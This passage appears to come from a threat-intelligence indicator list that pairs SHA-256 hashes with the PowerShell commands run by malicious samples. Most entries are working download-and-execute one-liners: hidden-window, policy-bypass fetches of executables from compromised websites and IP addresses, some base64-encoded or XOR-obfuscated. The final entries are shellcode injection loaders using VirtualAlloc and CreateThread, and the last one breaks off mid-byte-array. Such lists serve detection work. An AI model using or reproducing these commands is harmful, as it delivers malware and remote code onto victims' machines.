  40. 1a6859d265b94a2109d690999f62fdbadd8cb1894205e2e1b260a9f3bdcd8639
  41. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.WebClient; $wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://www.scuoladanzamaja.it/cgi/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  42. 0f474aa06bcacc1abfaa96032c811574236228c9282bf3f0eab1209fcc100f52
  43. 252ba8bb668cea38c591dcced0e72d1cd32c7f23a1457cea7e8fce2583b9eacf
  44. 63a10b5464cc3bf26499dc040f9e87d32e24d7bce5138b987cd64325e4eb6d2f
  45. 7a6b8d6ec833fccf4836c6ce5b75a9df5b3b12a697cd92ca1b9916c677683bc3
  46. 94023c7884a5fe3fdf05df1123a97c8927b7dd99c286fe809d536770f79931e8
  47. 95547cec97467513fd66cf8c8356f3c89c407308906c749affdf108a8cec61dc
  48. c4bd2bdd27483adf83e0fbc26e8a037b5991edb516051659cead5c01171c9b23
  49. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://djprestige.net/111000/logs/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  50. ac68d03caf70d7532faee1753311a03e89280e03c932cd21d54a029b80fcf1ac
  51. d0c5b593c8984eae8162b7009e87b3a0312729f7bc258831e4c30a75cc397a1d
  52. ec461149c060115256ec6dfc34f898e965f2c60e1809b2d52380c85e1c839780
  53. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://justins-gift.com/public/php/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  54. 564a229d224bc59f96369a11ebf6b8c0647e18f910de0c52dba9c18778be6a0e
  55. 5b7fd91d4899b9f5e8d784b187e7795901da519e772975b73490c9acb2ed48ad
  56. a9af835e6f09747f0aaf18904ad19b710a817bd4eef7e78bbd4dd585d8adfb9d
  57. cf3f43bce8106b5d327d4cd68e7c172b6726d4a6ae1f4ff61d310bab923a4406
  58. dbb8a06de8490ea795e11ad90ada1edf096489396aea204dfe1bab48154d7d65
  59. e58c6677f496877175e3388108d5f3b75ac4caa45a1ed35de339b90d516a5465
  60. poWeRShELl  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://16industries.com/cgi/logs.php','C:\Users\User1\AppData\Local\Temp\logs.php');
  61. a68c57f585f3842bfc6a37841c35057c2e7c5284611ea7df86acb3d17f8181bb
  62. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://23.95.242.119/word.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  63. f486d061afb7775013367fd1cdba84366e35028613a72ff85a8f908ac2591b63
  64. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://45.33.59.129/setup.exe','C:\Users\User1\AppData\Local\Temp\Server.exe');
  65. 6c98d4f2b62b4db730884f9bd6d27e5360693eaad02d9cdbaa0e71c4c747450b
  66. POwershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cl.ly/1o3p0U1E0222/download/office.office','C:\Users\User1\AppData\Roaming\MU.exe');
  67. 7222af9fe9f93f31e46e6878f8c5b4ea875bbb796cea760c9483ff5a2ae232f4
  68. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://gmjblog.com/andac.exe','C:\Users\User1\AppData\Local\Example.exe');Start-Process 'C:\Users\User1\AppData\Local\Example.exe'
  69. 7626a3c23d043a02188d5cf0fed2a9574eee809f1fefccf158e2ee35bfe47c61
  70. e68564db1b0c488eaf4432163d16c95e9b7ec8033484698a0ffa8905ea091581
  71. e79cb44885371b8c8f628916828e0b40d089091f1a77ddab391fc71231b57319
  72. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://gmjblog.com/andac.exe','C:\Users\User1\AppData\Roaming\Base64Lineandexecution2.EXE');Start-Process 'C:\Users\User1\AppData\Roaming\Base64Lineandexecution2.EXE'
  73. aa9c28b011c8ad40f1b6aedb8192681b0332a8a16b22abb6913f71aa4c8f3468
  74. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://hllcanbodia.com/80/1.exe','C:\Users\User1\AppData\Roaming\testtttt.exe');Start-Process 'C:\Users\User1\AppData\Roaming\testtttt.exe'
  75. e8c76ecec2cdb4a90ad310bede1289cc48a506df6f55483deb157bd0833ce439
  76. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://taxloker.top/update.exe','C:\Users\User1\AppData\Local\Temp\update.exe');
  77. 12197569c24a764a955ddedcc0332de2eac40e05aa2c9b9a7b53d74e19c0684a
  78. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.scuoladanzamaja.it/cgi/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  79. 115cdc939d0b8b4f90a2845f63b0d1b836acd425fc9bf09bcf9c72b762018e52
  80. 218066c354309d65cdc9da773e040bd4786efe38c7f66c31526be0fc5ceed2c4
  81. 24dfd6098bbebf923f3a0716d04fe27da264295fc6a2981d4fb9f4bf107b9745
  82. 45661e844c0df14d2f683e21c242193cbd14b1726f623db6d91b471fd24fd0d3
  83. 8e0541f397d4b17a86b1a023b9d462406d64d81c7370f6bdcec7b5756afeb950
  84. 8f3bf4c85cd7894e4d0870063eed8233c6a0107c474fac0fc4c21440cbdd9c83
  85. 9e8c3f289724899b789a6b29cfe168a59e9b1a1da0ed80696d3942ca139dce8c
  86. a7354db582ea195bcf89ec18e772458293b0f86c2a150a7ca07c044d56150dfc
  87. f7897f6e9443373da8df02d7ddb142f5a4ca97f412f023919ecdca5914955bd1
  88. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/ccnxkl.exe','C:\Users\User1\AppData\Roaming\ZNDRTwyhhabeerty.exe');
  89. 30e2bb73007f564783b0917122405de4e4934be0faf463d19c41e378eeb5e62e
  90. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/dgvpsw.exe','C:\Users\User1\AppData\Roaming\Shurrqexxaf.exe');
  91. 57b4833def9353901b421bc39f49c9874e2b77c403f31ca3cfc6c9a3bda17141
  92. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/judmkl.exe','C:\Users\User1\AppData\Roaming\SSDFgbbvahhajjauy.exe');
  93. 35c90b61e8b16e551b9e79ecceb5ea644e09af1f2271cc39f669a04c08b3c458
  94. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/lontdo.exe','C:\Users\User1\AppData\Roaming\LVyHHDEWQAcGBTy.exe');
  95. 359aa2f14a3df85fa68d78f37cddc00509d335311b2bc2a4260578911c814124
  96. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/nvniel.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  97. c66cbe1564589712a597610a3569f6d1b70226ce12ccf3b5d22d9aeb245d25bb
  98. PowerShell -Exec Bypass -NoL -Win Hidden -EncodedCommand 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 --> $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://37.28.154.204/powershell_attack.txt');
  99. 4e07b3f3740920c2bbf62437dcd09b7178dd9ed78970601be39dc0123eebc8e1
  100. PowerShell -Exec Bypass -NoL -Win Hidden -EncodedCommand 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 --> $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://37.28.155.22/2.txt');
  101. ccdf687c07973116d88ee9d63795731e9a78bd1dee28a7973bf391c426916d63
  102. PoWerShell -ExecutionPolicy ByPass -NoProfile -enc KAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBtAGEAeABpAC4AYgBlAHIAZwBtAGUAdAB6AGcAZQByAGUAaQAuAGMAaAAvAHMAaQByAHUAdABvAC8AZgBhAHgAZQBxAGkALwBkAG8AcwBvAHgAYQAuAHAAaABwACcALAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnACkAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnADsA --> ((new-object net.webclient).DownloadFile('http://maxi.bergmetzgerei.ch/siruto/faxeqi/dosoxa.php','1asdasd.exe'));Start-Process '1asdasd.exe';
  103. e9392e5a2eb3eff0db114962b70f21c5b02bf6554dad5411834bf535137d2ce9
  104. PoWerShell -ExecutionPolicy ByPass -NoProfile -enc KAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBzADgAZAA5ADAAZAAuAGYAZQBpAG4AZQBzAGEAbABzAGkAegAuAGMAaAAvAHgAaQBoAGUAbQB1AC8AawBvAGMAbwBsAGEALwBrAGkAaABlAHoAYQAuAHAAaABwACcALAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnACkAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnADsA --> ((new-object net.webclient).DownloadFile('http://s8d90d.feinesalsiz.ch/xihemu/kocola/kiheza.php','1asdasd.exe'));Start-Process '1asdasd.exe';
  105. 377b4f293e2d43d0d49e73af61b5dbf2320c8974de8eebaeabcdee7872d7f027
  106. powershell -NoP -sta -NonI -W Hidden -EncodedCommand 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 --> $WC=New-Object SYSTeM.NEt.WEBCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeadeRS.ADD('User-Agent',$u);$wc.PrOXy = [SysTEM.NET.WEbREqUEst]::DEfauLTWebPrOxY;$Wc.Proxy.CrEdEntialS = [SySteM.NeT.CREDEntialCaChe]::DEFaUltNetworKCRedeNTiAlS;$K='t[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v';$I=0;[cHaR[]]$b=([Char[]]($wc.DowNLOaDStrInG("http://37.28.155.22:8080/index.asp")))|%{$_-bXor$k[$I++%$k.LeNgTH]};IEX ($B-jOIN'')
  107. e57a2ceee5fd793b294fbca036750c204f4ecfb8e718db0ac2648f298fa9b086
  108. powershell.exe   -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://lulumchiangrai.com/wp-content/plugins/libravatar-replace/systemdll.exe','C:\Users\User1\AppData\Roamingputy.exe');&Start-Process 'C:\Users\User1\AppData\Roamingputy.exe'
  109. 3b7873e04939898118f3e00205aeb69443106d1f3f46d04150c65de749ccf05a
  110. 95c5d5e7d05557aa694b09f97c2675edb14a215c60d04c458b5862f1dc7674e1
  111. a5f8dbd950d9f73c243a0017bccf5deef186d7f1a3eeb6e115fc2762573b5bdb
  112. bf65ac501a838b19b51f68dc078f97d2f3a01033f9a69fe8d7ffe12d7d09e711
  113. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://birch.mcmstudio.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  114. 0397f6675be4a06562f12f9570e061f16d3ae860f3cbd2119c6c76881ae90427
  115. 0ae7a0030e5a4cab698a5e5e9eef1a4a458649287cd2b136fb3600766fed78b2
  116. 2e2b5f469950638185a5f356997106215b610b6dff8e41a50d3be2381a6431c8
  117. 87b16506d20550eda78267944a063f783b5c72dd0391400c324225e0b75af50a
  118. a3df30ffd9d9f2f5ab7978fd22ea704dfd79c58f8cf018c992e33908f13854fa
  119. cddb92d2630f1345f489894a12f188f65fc0d5abfa71c5d9fbdc70866424ec9f
  120. efbd8b4398903a0f91415bd1e695ee1c0a9781999662c6c620a9d304c4bd7287
  121. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://id.mcmweb.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  122. 0c0c90fd4d833786b623dac525e27396d91d33b5fe073bbba147956829f1b7ac
  123. 7b22da70189626512044071b1819a69d6cd15795de70f856defec5b649d94aa2
  124. ecfab97c03abe6ec133c48f063e71155006dbc129a0efb2492b8bafe70ad38ad
  125. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://salmon.mcmweb.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  126. 5281bbfb497bf414b59d9a034c9b49ee7101ef090b6fb50a062b4f2689e1203f
  127. 887df8ea46cc222ca9a1dec1d068f825ff816b598f8228d286254eaa744fb949
  128. ef2f3c7fac16ac3f55d48d630ec970ef32640e747992b4e952e5e4a170abce4b
  129. fe9bb6fa29ee2e447e16edcfd3946e8fc13ddcd4dca32e157782db4cb240c5aa
  130. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://server.mcmstudio.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  131. 006e4195c4e4e92ed20d4a012b79a6e351fe2577370e0a535cf68508ae70c50e
  132. ad5dbe00c946cf0c49d225d6758313c2049d25b1c7d84664bf7f6375f45d2420
  133. d1713b640014ba601e19c63c6c706f74f92c61847d1299ad61904f117fef7c13
  134. f9aed40f15a3b34cf1c0b79ec28733802a255d613c1aab1ce392b956b4816310
  135. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://filmdronereview.com/wp-content/plugins/libravatar-replace/scrwin.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  136. 58caeba03211f306663ac727e7e8fd55893ff66371d04a8110f7d91ca39d3b55
  137. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://indo-homecare.com/wp-content/plugins/libravatar-replace/documenti.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  138. 5ebbb9759f8d22d6e97e9528a52da36a4330450f5de43bad5b2826a6b28ef1ea
  139. 9edddbe189c44869b19a9ab0f69c7ad97046f3767b7944bba4f6d751e0900323
  140. e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 (this is the SHA-256 of zero-length input, i.e. an empty/failed download; it is not a usable file indicator)
  141. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://mithunwedskrishna.info/wp-content/plugins/libravatar-replace/schet.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  142. 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
  143. a61100319a2829b2a7d389517b05c24eae79f6e9ae9e154765abd91b7475cf96
  144. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://nindino.com/img/Factuur.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  145. 12e7a44ec7432d0f1c6dd5b20ef097590fba2e848d1e7f3293408dfa2874b1b2
  146. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://twiburc.com/wp-content/plugins/libravatar-replace/sbschet.exe','C:\Users\User1\AppData\Roaming.exe');&Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  147. 08b1ec9557156b22816a06e242d3d6ea6b81d6b9c0f0847a5763250d8a171b79
  148. 42f00149419837d6e920339a695fe01d6c6f873c86369c0672294f7e38719a1b
  149. 5ca7d11477186718a74a44feb97c96e1692085a5320460cad42f7677ec1a44e2
  150. 7357711b885361254952f3479b89dc5f0ac80c540acdfe24abf34415e3a7d197
  151. acbc39cf21b3da76472071550b6693bb45b2dccad4a6828829a8f34301b4be9d
  152. f763bb343fda9de53e84a55f3045a30e6670d3f26d007d66bca5fae073a81de5
  153. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://twiburc.com/wp-content/plugins/libravatar-replace/schet1008.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  154. e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 (SHA-256 of zero-length input — empty/failed download, not a usable file indicator)
  155. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.aziendacirrito.it/plugins/l.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  156. 104cd9c02f63d3dc6f1b42dcfc573f08143c1a18f24cf5dafe509d3a50a35143
  157. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.kivunrecovery.com/wp-content/plugins/libravatar-replace/novi.schet.doc.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  158. 7af7adc1000193cef4bd81b4962df96517f454503ce58257d6572ecdb2da10a4
  159. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/scrwin.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  160. 58fda26f0ef4692191f69770e449d1f2b26e12784506639037f4cc66188540fc
  161. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/vipiska.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  162. 24b4ca95f30f89c2229d35a7184612f122028588624865ea0f17764fe3d1ee1f
  163. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.technomodi.com/wp-content/plugins/libravatar-replace/uvedomlenie.doc.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  164. 004760c7a0a4d6d1da467fed6695cd58b6e1042941ff58a2c7178a733382ddec
  165. 05d73761013f3f7b6e30b506a158717e313c7c89cf5ba7d90275c4b956cc56a7
  166. 641d48ae15a9552cdbb058ee81f9427fe743ee55dbfe42f0bef03049c4382285
  167. c4c7e868a6ce1352a1cee80a1147b3ae3d42d6c133f43d1b91de68931dfb58b9
  168. e1eaef27961419f6a52e60e2a5cf8b9500a9d6a7d29e366283d3c95ca1ce8654
  169. e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 (SHA-256 of zero-length input — empty/failed download, not a usable file indicator)
  170. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://gymnastnsk.ru/media/media/images/mime-icon-32/file.jpg','C:\Users\User1\AppData\Local\Temp\1.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\1.exe'
  171. 4fb77d5d84651aaea6b719a80141cf67c1d5dde8e91ce43456fd8ad199ab3485
  172. c26a6129e73fbf86f22c5ea263d903fb27f9a35c5266b03ffd3b922698ebb4ee
  173. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://robertsplacements.ru/Dfexe/Away.exe','C:\Users\User1\AppData\Local\Temp\48349.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\48349.exe'
  174. 819471bfbdeab1349fe49ef82e92aea3292e16522db856eb9d5a98fb0ef9debe
  175. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://www.dilkoyayincilik.com/dosyalar/catalog/language/file.jpg','C:\Users\User1\AppData\Local\Temp\1.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\1.exe'
  176. 0ab7fdab7e23c9e65b3fc96721649b7621f3333c0f9c300530b7d67b43305441
  177. 233980d661f76d03a37231133960ae3184ec3920617d3931eeb6ecadba29faa0
  178. 626a35c9fc49e5a4bc1e27c0f1bc8a5709195ce41aa51f2cea72ae817f5ecbe5
  179. 96edc11155cacfc75d8449f08867d37cb54825dfc99280940fc0c553bc19af82
  180. ad1b5c86d870db15d689f51ba86e0e623d26449c821663062677004f1a9b7c31
  181. c5daaf7db43c376143dfd78ffca13a41405c82fbdd2cf54078b9b1852bbb65ae
  182. PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$APPDATA1=Get-ChildItem Env:APPDATA;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$APPDATA1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -LandScape Bypass IEX $($iex1) -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 
0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x89,0xe6,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x60,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x6a,0x50,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x4f,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1e,0x4b,0x0f,0x84,0x7b,0x00,0x00,0x00,0xeb,0xd1,0xe9,0x90,0x00,0x00,0x00,0xe8,0xac,0xff,0xff,0xff,0x2f,0x61,0x6e,0x64,0x61,0x63,0x2e,0x65,0x78,0x65,0x00,0xeb,0x6b,0x31,0xc0,0x5f,0x50,0x6a,0x02,0x6a,0x02,0x50,0x6a,0x02,0x6a,0x02,0x57,0x68,0xda,0xf6,0xda,0x4f,0xff,0xd5,0x93,0x31,0xc0,0x66,0xb8,0x04,0x03,0x29,0xc4,0x54,0x8d,0x4c,0x24,0x08,0x31,0xc0,0xb4,0x03,0x50,0x51,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0x2d,0x58,0x85,0xc0,0x74,0x16,0x6a,0x00,0x54,0x50,0x8d,0x44,0x24,0x0c,0x50,0x53,0x68,0x2d,0x57,0xae,0x5b,0xff,0xd5,0x83,0xec,0x04,0xeb,0xce,0x53,0x68,0xc6,0x96,0x87,0x52,0xff,0xd5,0x6a,0x00,0x57,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0x6a,0x00,0x68,
0xf0,0xb5,0xa2,0x56,0xff,0xd5,0xe8,0x90,0xff,0xff,0xff,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x65,0x78,0x65,0x00,0xe8,0x06,0xff,0xff,0xff,0x67,0x6d,0x6a,0x62,0x6c,0x6f,0x67,0x2e,0x63,0x6f,0x6d,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  183. b8e8a038c2378a609fa5a051d35deceb744431a72f5e5a084d46eb1f697ea113
  184. PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$Homedrive1=Get-ChildItem Env:Homedrive;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$Homedrive1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -q61QM6X5CKDhOx Bypass IEX $($iex1) -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 
